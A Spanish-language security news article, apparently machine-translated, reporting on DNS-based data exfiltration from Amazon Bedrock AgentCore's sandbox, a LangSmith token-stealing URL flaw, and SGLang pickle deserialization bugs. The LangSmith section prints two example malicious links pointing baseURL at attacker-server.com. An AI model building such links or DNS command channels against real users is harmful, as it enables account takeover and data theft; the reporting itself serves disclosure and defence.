Los investigadores de ciberseguridad han revelado detalles de un nuevo método para extraer datos confidenciales de entornos de ejecución de código de inteligencia artificial (IA) mediante consultas del sistema de nombres de dominio (DNS).

En un informe publicado el lunes, BeyondTrust revelada que el modo sandbox de Amazon Bedrock AgentCore Code Interpreter permite realizar consultas de DNS salientes que un atacante puede aprovechar para habilitar los shells interactivos y evitar el aislamiento de la red. El problema, que no tiene un identificador CVE, tiene una puntuación CVSS de 7,5 sobre 10,0.

Intérprete de código Amazon Bedrock AgentCore es un servicio totalmente gestionado que permite a los agentes de IA ejecutar código de forma segura en entornos de sandbox aislados , de forma que las cargas de trabajo de los agentes no pueden acceder a sistemas externos. Amazon lo lanzó en agosto de 2025.

El hecho de que el servicio permita realizar consultas de DNS a pesar de que la configuración «no tiene acceso a la red» puede permitir que «los actores de amenazas establezcan canales de comando y control y exfiltren datos a través del DNS en ciertos escenarios, eludiendo los controles de aislamiento de red esperados», afirma Kinnaird McQuade, arquitecto jefe de seguridad de BeyondTrust.

En un escenario de ataque experimental, un actor de amenazas puede abusar de este comportamiento para configurar un canal de comunicación bidireccional mediante consultas y respuestas de DNS, obtener una capa inversa interactiva, filtrar información confidencial a través de consultas de DNS si su función de IAM tiene permisos para acceder a los recursos de AWS, como los buckets de S3 que almacenan esos datos, y ejecutar comandos.

adsense

Además, se puede abusar del mecanismo de comunicación del DNS para entregar cargas útiles adicionales que se envían al intérprete de códigos, lo que hace que este sondee el servidor de comando y control (C2) del DNS en busca de comandos almacenados en los registros A del DNS, los ejecute y devuelva los resultados mediante consultas de subdominios de DNS.

Vale la pena señalar que el intérprete de código requiere una función de IAM para acceder a los recursos de AWS. Sin embargo, un simple descuido puede provocar que se asigne una función con privilegios excesivos al servicio, lo que le otorgue amplios permisos para acceder a datos confidenciales.

«Esta investigación demuestra cómo la resolución del DNS puede socavar las garantías de aislamiento de la red de los intérpretes de códigos en entornos aislados», afirma BeyondTrust. «Al utilizar este método, los atacantes podrían haber extraído datos confidenciales de los recursos de AWS, a los que se puede acceder mediante la función de IAM del intérprete de códigos, lo que podría provocar tiempos de inactividad, violaciones de datos de información confidencial de los clientes o eliminar la infraestructura».

Tras la divulgación responsable en septiembre de 2025, Amazon determinó que se trataba de una funcionalidad prevista y no de un defecto, por lo que instó a los clientes a utilizar Modo VPC en lugar del modo sandbox para un aislamiento completo de la red. El gigante tecnológico también recomienda el uso de un Firewall DNS para filtrar el tráfico DNS saliente.

«Para proteger las cargas de trabajo delicadas, los administradores deben hacer un inventario de todas las instancias activas del intérprete de código de AgentCore y migrar inmediatamente las que manejan datos críticos del modo Sandbox al modo VPC», afirma Jason Soroko, investigador principal de Sectigo.

«Operar dentro de una VPC proporciona la infraestructura necesaria para un aislamiento sólido de la red, lo que permite a los equipos implementar grupos de seguridad estrictos, ACL de red y firewalls DNS de Route53 Resolver para monitorear y bloquear la resolución de DNS no autorizada. Por último, los equipos de seguridad deben auditar rigurosamente las funciones de IAM asignadas a estos intérpretes, haciendo cumplir estrictamente el principio del mínimo privilegio para limitar el alcance de cualquier posible riesgo».

LangSmith es susceptible a una falla de apropiación de cuentas

La revelación se produce cuando Miggo Security reveló una falla de seguridad de alta gravedad en Lang Smith ( CVE-2026-25750 , puntuación CVSS: 8.5), lo que expuso a los usuarios a posibles robos de tokens y apropiación de cuentas. Este problema, que afecta tanto a los despliegues autohospedados como a los despliegues en la nube, se solucionó en la versión 0.12.71 de LangSmith, publicada en diciembre de 2025.

La deficiencia se ha caracterizado como un caso de inyección de parámetros de URL debido a la falta de validación del parámetro baseURL, lo que permite a un atacante robar el token del portador, el ID de usuario y el ID del espacio de trabajo de un usuario que ha iniciado sesión y se transmiten a un servidor bajo su control mediante técnicas de ingeniería social, como engañar a la víctima para que haga clic en un enlace especialmente diseñado, como el siguiente:

  • Nube: smith.langchain [.] com/studio/? URL base = https://attacker-server.com
  • Autohospedado - <LangSmith_domain_of_the_customer>/studio/? URL base = https://attacker-server.com

La explotación exitosa de la vulnerabilidad podría permitir a un atacante obtener acceso no autorizado al historial de rastreo de la IA, así como exponer consultas SQL internas, registros de clientes de CRM o código fuente propietario al revisar las llamadas a las herramientas.

«Un usuario de LangSmith que haya iniciado sesión podría verse comprometido simplemente accediendo a un sitio controlado por un atacante o haciendo clic en un enlace malicioso», afirman Liad Eliyahu y Eliana Vuijsje, investigadores de Miggo. dijo .

«Esta vulnerabilidad es un recordatorio de que las plataformas de observabilidad de la IA son ahora una infraestructura crítica. Como estas herramientas priorizan la flexibilidad de los desarrolladores, a menudo eluden inadvertidamente las barreras de seguridad. Este riesgo se agrava porque, al igual que el software «tradicional», los agentes de IA tienen un acceso profundo a las fuentes de datos internas y a los servicios de terceros».

Fallos inseguros de deserialización de pepinillos en SGLang

También se han detectado vulnerabilidades de seguridad en SGLang, un popular marco de código abierto para servir a grandes modelos lingüísticos y modelos de IA multimodales, que, si se explotan con éxito, podrían desencadenar deserialización insegura de pepinillos , lo que podría provocar la ejecución remota de código.

Las vulnerabilidades, descubiertas por el investigador de seguridad de Orca, Igor Stepansky, permanecen sin parches al momento de escribir este artículo. Una breve descripción de las fallas es la siguiente:

  • CVE-2026-3059 (Puntuación CVSS: 9,8): una vulnerabilidad de ejecución remota de código no autenticada a través del bróker ZeroMQ (también conocido como ZMQ), que deserializa datos no confiables mediante pickle.loads () sin autenticación. Afecta al módulo de generación multimodal de SGLang.
  • CVE-2026-3060 (Puntuación CVSS: 9,8): una vulnerabilidad de ejecución remota de código no autenticada a través del módulo de desagregación, que deserializa datos que no son de confianza mediante pickle.loads () sin autenticación. Afecta al sistema de desagregación paralela del codificador de SGLang.
  • CVE-2026-3989 (Puntuación CVSS: 7.8): el uso de una función pickle.load () insegura sin validación ni deserialización adecuada en "replay_request_dump.py» de SGLang, que puede explotarse proporcionando un archivo pickle malicioso.

«Los dos primeros permiten la ejecución remota de código sin autenticar contra cualquier implementación de SGLang que exponga sus funciones de generación o desagregación multimodales a la red», Stepansky dijo . «La tercera implica la deserialización insegura en una utilidad de reproducción de crash dump».

enlaces

En un aviso coordinado, el Centro de Coordinación del CERT (CERT/CC) dijo que el SGLang es vulnerable al CVE-2026-3059 cuando el sistema de generación multimodal está habilitado y al CVE-2026-3060 cuando el sistema de desagregación en paralelo del codificador está habilitado.

«Si se cumple alguna de las dos condiciones y un atacante conoce el puerto TCP en el que escucha el agente de ZMQ y puede enviar solicitudes al servidor, puede aprovechar la vulnerabilidad enviando un archivo pickle malintencionado al agente, que luego lo deserializará», CERT/CC dijo .

Se recomienda a los usuarios de SGLang que restrinjan el acceso a las interfaces de servicio y se aseguren de no estar expuestos a redes que no sean de confianza. También se recomienda implementar una segmentación de red y controles de acceso adecuados para evitar la interacción no autorizada con los puntos finales de ZeroMQ.

Si bien no hay pruebas de que estas vulnerabilidades se hayan aprovechado de forma espontánea, es fundamental supervisar las conexiones TCP entrantes inesperadas al puerto del intermediario de ZeroMQ, los procesos secundarios inesperados generados por el proceso SGLang Python, la creación de archivos en ubicaciones inusuales mediante el proceso SGLang y las conexiones salientes del proceso SGLang a destinos inesperados.

¿Te ha parecido interesante este artículo? Síguenos en Noticias de Google , Twitter y LinkedIn para leer más contenido exclusivo que publicamos.